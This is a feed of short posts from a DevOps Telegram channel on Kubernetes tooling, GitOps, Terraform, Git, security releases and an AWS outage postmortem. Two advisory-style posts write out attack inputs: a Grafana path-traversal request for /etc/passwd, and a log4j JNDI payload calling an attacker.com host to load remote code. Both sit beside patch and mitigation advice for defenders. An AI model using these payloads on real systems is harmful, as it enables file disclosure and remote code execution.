CatOps
5.08K subscribers
94 photos
5 videos
19 files
2.57K links
DevOps and other issues by Yurii Rochniak (@grem1in) - SRE @ Preply && Maksym Vlasov (@MaxymVlasov) - Engineer @ Star. Opinions on our own.

We do not post ads including event announcements. Please, do not bother us with such requests!
Download Telegram
Some people use to think that a job interview is a one-way road. Like an exam: there’s a person or two who ask questions to evaluate your skills and you should excel in answering everything.

While in reality interviews are bi-directional process. It is important for a company to hire matching talent, but it’s not less important for an individual to look for a matching company.

Here Gergely Orosz, an author of The Pragmatic Engineer Blog, proposes a test to evaluate the engineering culture in a team (eng culture may be different from team to ten in the large companies). This tests consists of 12 questions, which you can ask at any stage of the interviewing process.

As a bonus, you can evaluate you current company as well!

#culture #hiring
I have already recommended CUE (or cuelang) in a few chats to validate Kubernetes manifests.

However, the language itself is capable of many more things than just validate some configuration files.

For example, you can write your configuration in CUE as well!

Here is a blog post, which describes the basic concepts of this language as well as some real world use cases.

#cue #kubernetes
​​Some useful resources for Kubernetes CKA exam preparation:
- Kubectl Cheat Sheet for Kubernetes Admins & CKA Exam Prep
- Useful bookmarks. You are allowed to use those
- Killer.sh - CKS, CKA, CKAD simulator

Good luck to those, who is looking forward to complete one of those exams!

#kubernetes #education
Nice overview of policy enforcement tools for Kubernetes by Viktor Farcic. Gatekeeper (OPA implementation for K8s) vs Kyverno specifically.

tl;dr: Kyverno won this one.

However, I would like to make a few personal additions in favor of Gatekeeper. The first important point - and Viktor mentions it as well - is that you can use OPA to enforce policies outside Kubernetes. For example, you can write policy checks for your Terraform code and why not. Also, you can use something like Conftest to check your resources even before they are applied in a cluster!

Another important thing I want to point out is that Rego is a real programming language, even though it‘s not the most obvious one. You can write tests for your constraint templates, which is very powerful in terms of keeping your policies in a good shape. With Kyverno you have YAML, which is easier, but you need to validate YAML somehow. With Rego you get tests out of the box. Here is a good article that helped me write tests for Rego back in a day.

#kubernetes #security #kyverno #opa #gatekeeper #rego
I have two recommendations of books bundles today. I was thinking if it makes sense to combine them into one message, but decided to push them separately.

So, the first one is a bundle of Python books by O'Reilly:
- Web Scrapping with Python
- Test Driven Development with Python
- Using Asyncio in Python
- High Performance Python
- Introducing Python
- Think Python
- Hands-On Unsupervised Learning Using Python
- Python Data Science Handbook
- Thoughtful Machine Learning with Python
- Flask Web Development
- Machine Learning Pocket Reference
- Hitchhiker's Guide to Python
- Elegant SciPy
- NLP with Python

As usual, you can pay at least €15.55 to unlock all of these books or pay less to unlock some of them. There's no upper limit, though. You can pay whatever you want and Humble Bundle will redirect your funds to charity.

# books #python #programming
The next book bundle is about security.

- Microsoft Azure Security and Privacy Concepts
- Hack Yourself First: How to go on the Cyber-Offense
- Security in the Cloud
- Security Compliance: The Big Picture
- Security for Hackers and Developers: Overview
- Threats, Attacks, and Vulnerabilities for CompTIA Security+
- Incident Detection and Investigation with QRadar
- AWS Cloud Security Best Practices
- Microsoft 365 Security: Threat Protection Implementation and Management
- Cisco CyberOps: Security Monitoring
- Cloud Security: Introduction to Certified Cloud Security Professional (CCSP(r))
- Linux Host Security
- Operationalizing Cyber Threat Intel: Pivoting & Hunting
- Security Awareness: Basic Concepts and Terminology
- Splunk Enterprise Security: Big Picture
- Threat Intelligence: Cyber Threats and Kill Chain Methodology
- Cyber Security Essentials: Your Role in Protecting the Company
- Security Management: A Case Study
- Security Awareness: Phishing - How Hackers Get Your Secrets
- Cyber Security Careers for IT Professionals

As usual, you can pay what you want. Minimum payment of €21.59 will unlock all 20 books.

#books #security
From our subscribers.

Application Delivery Technical Advisory Group of CNCF released the v1.0.0 of GitOps specification.

You can find the specification itself on the GitHub.

Basically, a GitOps system should comply with 4 main principles:
1. Declarative: A system managed by GitOps must have its desired state expressed declaratively.
2. Versioned and Immutable: Desired state is stored in a way that enforces immutability, versioning and retains a complete version history.
3. Pulled Automatically: Software agents automatically pull the desired state declarations from the source. Agents within the system pull the desired state from the repository.
4. Continuously Reconciled: Software agents continuously observe the actual system state and attempt to apply the desired state.

You could kinda deduce these principles already, but now they’re formalized. Besides, you can adopt these principles and, well, GitOps not only for your services, but for IaC as well.

There are still open questions, for example, how to handle incidents in the immutable environment. However, I like the overall direction. Specifically the point that even though we switched to “cattle” servers from the “pet” ones, we still trat environments as “pets” and we need to stop that.

I see that demand for running dynamic environments increasing across the industry. So, this is definitely a valid point and an interesting area to explore.

#gitops #cicd #culture
Our tech stack differs from one company to another. However, there are certain things that almost everybody use. Like, for example, Git!

Here are some release notes for Git 2.34

This release introduces the use of sparse index for some of git commands.

You can read more about sparse checkout and sparse index here.

This is especially useful for monorepo users. Although, I haven't being working with one for more than 2 years now, I have some repos in mind, where I would like to test it.

As a bonus: An article about Git's data structures and their behavior. Commits are not diffs, folks!

#git
Ship / Show / Ask - A modern branching strategy

It's a branching strategy that combines the features of Pull Requests with the ability to keep shipping changes.

Changes are categorized as either:

- Ship (merge into mainline without review)
- Show (open a pull request for review, but merge into mainline immediately)
- Ask (open a pull request for discussion before merging)

From CatOps Chat

#github
👍1
Our friends from Cossack Labs have released a new version of their Acra tool.

Acra is a database security suite for data protection. It provides application-level encryption for data fields, multi-layered access control, database leakage prevention, and intrusion detection capabilities in one suite. Acra was specifically designed for distributed apps (web, server-side and mobile) that store data in one or many databases. Basically, you can encrypt individual fields completely transparent for an application!

So, what's special about this release? A lot of features that previously were available only in the enterprise version now made their way to open source! Among them: database encryption, searchable encryption, and encryption-as-a-service API.

Apart from that, Acra allows to tokenize certain fields in your database to achieve anonymization. This is actually a cool feature! In one of my former companies we had to create our own tool to achieve that. Here you get it as a part of the package.

#security #databases #toolz
On our last voice chat we briefly discussed Kubernetes autoscaling and mentioned Karpenter - a cluster autoscaler backed by AWS.

This tool isn’t new. However, but AWS started to promote it recently. So, it’s probably “production ready enough” from their judgment. Also, it looks like Karpenter can work with spot instances, which makes it a super-interesting tool to follow.

You can read more about it in the AWS blog post.

If you are already using it or you have tried it, feel free to share your opinions in our chat!

#kubernetes #scaling #toolz
A short but insightful article on how to perform threat modelling by GitLab

I covers some basics like building diagrams as well as describes popular STRIDE framework for threat modelling.

STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Rrepudiation - Claiming to have not performed an action
- Information disclosure -Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization

Here you can find a bit more detailed description for each area with some examples.

P.S. In general, GitLab has a lot of great documentation and blog posts in free access, not only on security or operational topics but on various work aspects. I strongly suggest checking out their handbook. Maybe, you can find there some guidance on topics that are important for you at the moment.

#security
I'm a bit hesitant of posting hot news, because there are usually people, who do that faster than me.

This one is worth mentioning, though. Grafana fixed 0-day vulnerability that was discovered yesterday.

Vulnerability in nutshell, in case you've missed it. You were able to access restricted locations with a query like this one:
 /public/plugins/<PLUGIN>/../../../../../../../etc/passwd


Versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7 were released recently and have a patch for this vulnerability. Make sure to upgrade!

#security
Astrologists declare a week of application delivery.

So today, I want to share with you an article that touches the problem of delivering infrastructure dependencies in the modern world.

The problem statement is that almost no applications are running purely on their own. Especially, if we're talking about corporate backend services. These applications require databases, queues, blob storage and many more dependencies to run correctly.

Who's responsible for that, though? Is it application developers? Well, in this case, they'll need to learn a bunch of things related to those topics. It likely doesn't have much sense from a business point of view. On another hand, creating a separate team to provide dependencies on-demand literally brings us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.

In this article, an author argues that bundling application dependencies alongside with the codebase is the best way to go. One can have a team that delivers these building blocks and a developer then combine them like a Lego in their config files.

This is a very interesting approach (at least for me) and I truly believe that this would be the next big thing in DevOps-ish world. As for now, though, an author mentions a few tools that could help here. However, in my humble opinion, an existing toolset is not quite there yet and there is still a long way to go.

P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I don't know how to motivate myself. Therefore, I would rather create a series of small Telegram posts with on this topic. Stay tuned!

#app_bundle #kubernetes #crossplane
​​TF 1.1.0 was released, and maybe the most interesting feature is the ability to force vars to be not-null

 Non-nullable with a default: if left unset, or set explicitly to null, then
# it takes on the default value
# In this case, the module author can safely assume var.d will never be null
variable "e" {
nullable = false
default = "hello"
}

# Non-nullable with no default: variable must be set, and cannot be null.
# In this case, the module author can safely assume var.d will never be null
variable "d" {
nullable = false
}


By default, all variables set implicitly to nullable = true.

#terraform
0-day vulnerability found in the popular Java log4j library.

Now, why is it important.

You may like Java or not, but it is a crazily popular programming language. Runs on billions of devices, bla-bla.

log4j
is a very popular, if not the most popular, logging library for Java. If you have Java services in your landscape, and they write logs, chances are high they use log4j.

The exploit is stupidly silly. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here how it works:

1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
4. This response contains a path to a remote Java class file (ex. https://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

It looks like the quickest mitigation is to set -Dlog4j2.formatMsgNoLookups=true Java parameter for all your services if you're using log4j >= 2.10 or re-configure JDK.

Also, check your Java services' logs. Maybe, you already are poisoned.

#security #0day
GitLab issued new security releases: 14.5.2, 14.4.4, and 14.3.6

These releases contain patches for various security vulnerabilities, including one with High severity.

So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!

#gitlab #security
Amazon has published a public postmortem for the recent issues on Friday. However, it went through a little bit unnoticed because of the Log4j story (see one of the previous posts).

So, the original issue is happened to be a cascading failure, which led to congestion in AWS internal networks. This is an interesting part, because it puts some light on AWS internals.

So, the internal monitoring system as well as parts of control plane for EC2 reside in the internal network, which experienced issues. That's why AWS team was operating with partial visibility of their systems, which impacted the speed of resolution.

Customer services were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them, not start a new one. These matters happened to be more critical for certain services within AWS line API Gateways and Amazon Connect.

The interesting thing is that these events were caused by the code that was there for years (according to AWS). Unfortunately, an unexpected behavior was revealed during an automated scaling event.

To mitigate such issues in future, AWS switched off automatic scaling in us-east-1. They claim that they have enough capacity already. As well as they're working on a fix for the part of code that caused the co congestion in the first place. I assume, there are many other internal action items from this outage as well.

#aws #postmortem